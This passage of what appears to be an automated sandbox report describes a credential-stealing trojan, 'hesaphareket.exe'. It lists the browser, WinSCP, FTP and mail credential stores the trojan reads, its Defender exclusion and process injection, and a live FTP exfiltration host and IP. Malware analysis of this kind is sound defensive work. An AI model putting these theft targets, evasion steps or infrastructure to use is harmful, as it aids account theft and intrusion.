Source: C:\Users\user\Desktop\hesaphareket.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\hesaphareket.exe - Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\Desktop\hesaphareket.exe - Queries volume information: C:\Users\user\Desktop\hesaphareket.exe VolumeInformation
Source: C:\Users\user\Desktop\hesaphareket.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\hesaphareket.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\hesaphareket.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\hesaphareket.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\hesaphareket.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\hesaphareket.exe - Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    Source: Yara match | File source: dump.pcap, type: PCAP
                    Source: Yara match | File source: 0.2.hesaphareket.exe.37e9150.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.hesaphareket.exe.3823770.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 7.2.hesaphareket.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.hesaphareket.exe.3823770.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.hesaphareket.exe.37e9150.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000007.00000002.3772427480.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000007.00000002.3771073304.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000007.00000002.3772427480.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1333405214.00000000035D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: hesaphareket.exe PID: 6188, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: hesaphareket.exe PID: 7212, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\Desktop\hesaphareket.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Source: C:\Users\user\Desktop\hesaphareket.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\Desktop\hesaphareket.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Users\user\Desktop\hesaphareket.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\Desktop\hesaphareket.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\Desktop\hesaphareket.exe | File opened: C:\FTP Navigator\Ftplist.txt
                    Source: C:\Users\user\Desktop\hesaphareket.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara match | File source: 0.2.hesaphareket.exe.37e9150.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.hesaphareket.exe.3823770.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 7.2.hesaphareket.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.hesaphareket.exe.3823770.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.hesaphareket.exe.37e9150.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000007.00000002.3771073304.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000007.00000002.3772427480.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1333405214.00000000035D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: hesaphareket.exe PID: 6188, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: hesaphareket.exe PID: 7212, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara match | File source: dump.pcap, type: PCAP
                    Source: Yara match | File source: 0.2.hesaphareket.exe.37e9150.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.hesaphareket.exe.3823770.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 7.2.hesaphareket.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.hesaphareket.exe.3823770.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.hesaphareket.exe.37e9150.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000007.00000002.3772427480.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000007.00000002.3771073304.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000007.00000002.3772427480.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1333405214.00000000035D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: hesaphareket.exe PID: 6188, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: hesaphareket.exe PID: 7212, type: MEMORYSTR
                    MITRE ATT&CK Matrix (one column per tactic; a number before a technique name is the report's signature badge for that technique, techniques without a number are unmatched placeholders)

                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Disable or Modify Tools | 2 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Encrypted Channel | 1 Exfiltration Over Alternative Protocol | Abuse Accessibility Features
                    Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 111 Process Injection | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 24 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
                    Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 3 Obfuscated Files or Information | 1 Credentials in Registry | 111 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                    Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 12 Software Packing | NTDS | 1 Process Discovery | Distributed Component Object Model | 21 Input Capture | 11 Application Layer Protocol | Traffic Duplication | Data Destruction
                    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 141 Virtualization/Sandbox Evasion | SSH | 1 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 141 Virtualization/Sandbox Evasion | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                    Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 111 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                    Behavior Graph (ID: 1561748, sample: hesaphareket.exe, start date: 24/11/2024, architecture: WINDOWS, score: 100)

                    Start
                      DNS/IP: ftp.normagroup.com.tr
                      Signatures: Multi AV Scanner detection for domain / URL; Suricata IDS alerts for network traffic; Found malware configuration; 10 other signatures
                      -> hesaphareket.exe (process 8) started
                           Created file: C:\Users\user\...\hesaphareket.exe.log, ASCII (dropped)
                           Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
                           -> hesaphareket.exe (process 12) started
                                DNS/IP: ftp.normagroup.com.tr 104.247.165.99, ports 21, 49712, 49724, ASN-QUADRANET-GLOBALUS, United States
                                Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; 2 other signatures
                           -> powershell.exe (process 16) started
                                Signatures: Loading BitLocker PowerShell Module
                                -> WmiPrvSE.exe (process 22) started
                                -> conhost.exe (process 24) started
                           -> hesaphareket.exe (process 18) started
                           -> hesaphareket.exe (process 20) started

                    Source | Detection | Scanner | Label
                    hesaphareket.exe | 58% | ReversingLabs | ByteCode-MSIL.Trojan.Remcos
                    hesaphareket.exe | 58% | Virustotal |
                    hesaphareket.exe | 100% | Joe Sandbox ML |
                    No Antivirus matches
                    No Antivirus matches
                    Source | Detection | Scanner | Label
                    ftp.normagroup.com.tr | 11% | Virustotal |
                    Source | Detection | Scanner | Label
                    http://ftp.normagroup.com.tr | 11% | Virustotal |
                    http://ftp.normagroup.com.tr | 0% | Avira URL Cloud | safe
                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    ftp.normagroup.com.tr | 104.247.165.99 | true | true | | unknown
                    Name | Source | Malicious | Antivirus Detection | Reputation
                    http://ftp.normagroup.com.tr | hesaphareket.exe, 00000007.00000002.3772427480.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp, hesaphareket.exe, 00000007.00000002.3772427480.0000000002CFC000.00000004.00000800.00020000.00000000.sdmp | true | 11%, Virustotal; Avira URL Cloud: safe | unknown
                    http://tempuri.org/ianiDataSet1.xsd | hesaphareket.exe | false | | high
                    https://account.dyn.com/ | hesaphareket.exe, 00000000.00000002.1333405214.00000000035D9000.00000004.00000800.00020000.00000000.sdmp, hesaphareket.exe, 00000007.00000002.3771073304.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | hesaphareket.exe, 00000000.00000002.1331722297.000000000262A000.00000004.00000800.00020000.00000000.sdmp, hesaphareket.exe, 00000007.00000002.3772427480.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://tempuri.org/ianiDataSet2.xsdM | hesaphareket.exe | false | | high
                    http://tempuri.org/ianiDataSet.xsd | hesaphareket.exe | false | | high
                               IP | Domain | Country | ASN | ASN Name | Malicious
                               104.247.165.99 | ftp.normagroup.com.tr | United States | 8100 | ASN-QUADRANET-GLOBALUS | true
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1561748
                              Start date and time:2024-11-24 08:21:38 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 8m 5s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                               Number of new started processes analysed:15
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:hesaphareket.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@11/6@1/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 96
                              • Number of non-executed functions: 7
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                               • Not all processes were analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtCreateKey calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                               Time | Type | Description
                               02:22:35 | API Interceptor | 10337704x Sleep call for process: hesaphareket.exe modified
                               02:22:37 | API Interceptor | 16x Sleep call for process: powershell.exe modified
                               Match: 104.247.165.99
                               Associated Sample Name / URL | Detection | Threat Name
                               wKmhzHd4MC.exe | malicious | AgentTesla
                               hesaphareketi__20241001.exe | malicious | AgentTesla
                               EUR Swift Bildirimi12-08-2024.exe | malicious | AgentTesla
                               LisectAVT_2403002A_134.exe | malicious | AgentTesla
                               hesaphareketi_____.exe | malicious | AgentTesla
                               hesaphareketi__.exe | malicious | AgentTesla
                               hesaphareketi-.exe | malicious | AgentTesla
                               hesaphareketi-.exe | malicious | AgentTesla
                               hesaphareketi-01-pdf.exe | malicious | AgentTesla
                               19-03-2024_Takas_Sonuclari.exe | malicious | AgentTesla
                               Match: ftp.normagroup.com.tr
                               Associated Sample Name / URL | Detection | Threat Name | Context
                               wKmhzHd4MC.exe | malicious | AgentTesla | 104.247.165.99
                               hesaphareketi__20241001.exe | malicious | AgentTesla | 104.247.165.99
                               EUR Swift Bildirimi12-08-2024.exe | malicious | AgentTesla | 104.247.165.99
                               LisectAVT_2403002A_134.exe | malicious | AgentTesla | 104.247.165.99
                               hesaphareketi_____.exe | malicious | AgentTesla | 104.247.165.99
                               hesaphareketi__.exe | malicious | AgentTesla | 104.247.165.99
                               hesaphareketi-.exe | malicious | AgentTesla | 104.247.165.99
                               hesaphareketi-.exe | malicious | AgentTesla | 104.247.165.99
                               hesaphareketi-01-pdf.exe | malicious | AgentTesla | 104.247.165.99
                               19-03-2024_Takas_Sonuclari.exe | malicious | AgentTesla | 104.247.165.99
                               Match: ASN-QUADRANET-GLOBALUS
                               Associated Sample Name / URL | Detection | Threat Name | Context
                               sparc.nn.elf | malicious | Mirai, Okiru | 156.239.44.232
                               +11375 Caller left Vc MsG 8b1538917f01661e6746a0528d545dbeac3b40a5- 73945.msg | malicious | HtmlDropper | 185.174.100.20
                               stthigns.doc | malicious | Lokibot | 66.63.187.231
                               goodtoseeuthatgreatthingswithentirethingsgreatfor.hta | malicious | Cobalt Strike, Lokibot | 66.63.187.231
                               ________.exe | malicious | Quasar | 155.94.209.8
                               PO-000041492.docx.doc | malicious | Lokibot | 66.63.187.231
                               ________.exe | malicious | Quasar | 69.174.98.113
                               seemefasterthanbeforewithhisbestthingsinonlineforgetreadyfor.hta | malicious | Cobalt Strike, HTMLPhisher, Lokibot | 66.63.187.231
                               PO-000041492.xls | malicious | HTMLPhisher, Lokibot | 66.63.187.231
                               RFQ541634_A_URGENT_QUOTATION_SHENLE.exe | malicious | GuLoader | 64.188.27.210
                                                  No context
                                                  No context
                                                  Process:C:\Users\user\Desktop\hesaphareket.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1216
                                                  Entropy (8bit):5.34331486778365
                                                  Encrypted:false
                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                  Malicious:true
                                                  Reputation:high, very likely benign file
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):2232
                                                  Entropy (8bit):5.380747059108785
                                                  Encrypted:false
                                                  SSDEEP:48:lylWSU4xc4RQmFoUeW+gZ9tK8NPZHUxL7u1iMuge//ZPUyud:lGLHxcIFKLgZ2KRHWLOugbd
                                                  MD5:C149F26ECCA45F5FF907D47A0F31FDFA
                                                  SHA1:5AA35127F59E887C14D3726A59E1C3EAD5C51691
                                                  SHA-256:B3103403C6CEF941A303E03CB7A29A1FAFD2BFB9B7125F1DF126DE55C2D9BCA4
                                                  SHA-512:B33AA9D5A78A9AA35E7C30E27F7A94C6322D45C067A473FA5A23A2A5D4EE8DDDB7CE1014674BDFDDB194DEB18E47D0154D081C66E073911872943D7FF4936BB8
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.ConfigurationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
